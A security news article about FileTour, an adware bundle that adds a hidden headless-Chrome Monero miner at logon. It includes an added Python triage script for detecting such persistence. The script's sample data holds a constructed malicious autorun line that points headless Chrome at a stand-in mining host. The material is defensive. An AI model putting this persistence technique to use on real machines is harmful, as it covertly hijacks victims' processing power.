An adware bundle has been discovered which installs software to mine cryptocurrency on user PCs without their consent.
Bleeping Computer reports that an adware bundle called FileTour has long walked a tightrope between nuisanceware, adware, and potentially unwanted programs (PUPs), but the package has now gone further by jumping on the cryptojacking bandwagon.
FileTour, believed to be of Russian origin, is a Windows executable which is often bundled with other downloads including software cracks and key generators.
Now, FileTour has introduced a new component which steals user processing power for the purpose of mining for cryptocurrency.
Known as cryptojacking, this practice uses often-legitimate mining scripts, run inside a browser without the user's consent, and funnels the proceeds to wallets or mining pools controlled by the threat actors.
According to the publication, the bundle creates a Windows autorun entry that launches Google Chrome with the command-line switch for Chrome's headless mode, so the browser starts with no visible window and the user never sees it.
Each time the user logs into Windows, the hidden browser loads a mining page that runs the CoinCube mining script, which consumes the PC's processing power to mine Monero.
CPU usage can climb to around 80 percent. Victims may notice that their PCs have become slow, but because the only visible symptom is a busy chrome.exe process, many will simply blame Chrome, and it could be a long time before the miner is uncovered and removed.
When the researcher opened the page responsible for the script in a normal browser window, it revealed another trick: the page masquerades as a Cloudflare anti-DDoS check, giving anyone who stumbles across it a plausible reason for the delay and CPU load.
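The persistence described above leaves a concrete artefact: an autorun entry (or scheduled task) whose command line starts chrome.exe in headless mode and points it at a remote page. The following is an added example, not code from the Bleeping Computer write-up or from the FileTour bundle, showing a triage check a responder could run over collected autorun command lines. The sample entries, the domain miner.example and the severity scheme are constructed for illustration.

```python
import ntpath
import re
from urllib.parse import urlparse

# Constructed sample autorun entries, e.g. values collected from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run. These are invented
# for this example and are not artefacts taken from the FileTour bundle.
SAMPLE_AUTORUNS = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "ChromeUpdate": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpu http://miner.example/cf-check.html',
    "Chrome": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window',
    "ReportJob": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --print-to-pdf=C:\reports\out.pdf file:///C:/reports/in.html',
}

# Chrome's headless switch in its current and legacy spellings.
HEADLESS_SWITCHES = {"--headless", "--headless=new", "--headless=old"}


def split_windows_cmdline(cmdline):
    """Minimal Windows-style tokenizer: double-quoted runs stay one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def extract_urls(args):
    """Return navigation targets: bare URL arguments plus --app=<url>."""
    urls = []
    for tok in args:
        if tok.lower().startswith("--app="):
            urls.append(tok[len("--app="):])
        elif not tok.startswith("--"):
            urls.append(tok)
    # Keep only tokens that parse as real URLs (http, https, file, ...);
    # a lone drive letter such as C:\x would otherwise parse as scheme "c".
    return [u for u in urls if len(urlparse(u).scheme) > 1]


def assess_autorun(name, cmdline):
    """Classify one autorun entry. Returns None when nothing is of interest."""
    tokens = split_windows_cmdline(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() != "chrome.exe":
        return None
    args = tokens[1:]
    if not any(a.lower() in HEADLESS_SWITCHES for a in args):
        return None  # a normal Chrome autorun is not by itself suspicious
    remote = [u for u in extract_urls(args) if urlparse(u).scheme in ("http", "https")]
    if remote:
        # Headless Chrome started at logon and pointed at a remote page is the
        # exact shape of the cryptojacking persistence described in the text.
        return {"name": name, "severity": "high",
                "reason": "headless Chrome autorun navigating to " + ", ".join(remote)}
    # Headless Chrome rendering a local file (e.g. a PDF job) is unusual on an
    # end-user PC but can be legitimate automation; flag it for review only.
    return {"name": name, "severity": "medium",
            "reason": "headless Chrome autorun without a remote page (review the job)"}


def scan_autoruns(autoruns):
    """Run assess_autorun over a name -> command line mapping."""
    findings = [assess_autorun(n, c) for n, c in autoruns.items()]
    return [f for f in findings if f]


if __name__ == "__main__":
    for f in scan_autoruns(SAMPLE_AUTORUNS):
        print(f"[{f['severity']}] {f['name']}: {f['reason']}")
```

The same function can be fed the CommandLine field of Sysmon process-creation events (Event ID 1) or EDR telemetry, which catches the miner even when persistence is achieved through a scheduled task rather than a Run key. Note that the check keys on the headless switch plus a remote URL rather than on any particular domain, since the mining page in this case hides behind a fake Cloudflare check and the hostname is easily rotated.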
We are likely to see more and more cases of cryptojacking. The technique is already becoming common in attacks against enterprise cloud environments, websites are being compromised to serve mining scripts, and social engineering campaigns are hitting networks with the sole aim of infiltrating PCs for cryptojacking.
In an interesting case of adware and cryptocurrency mining colliding this March, cybersecurity researchers from Netlab 360 uncovered an advertising network which was able to bypass ad blockers in order to serve cryptojacking scripts.
The company used a domain generation algorithm (DGA) to produce random-looking domain names that the static blocklists used by ad blockers would not match, and then went further by using the same technique to deploy cryptocurrency mining scripts. Websites connected to the ad network unwittingly served the scripts, which stole visitor CPU power to mine Monero.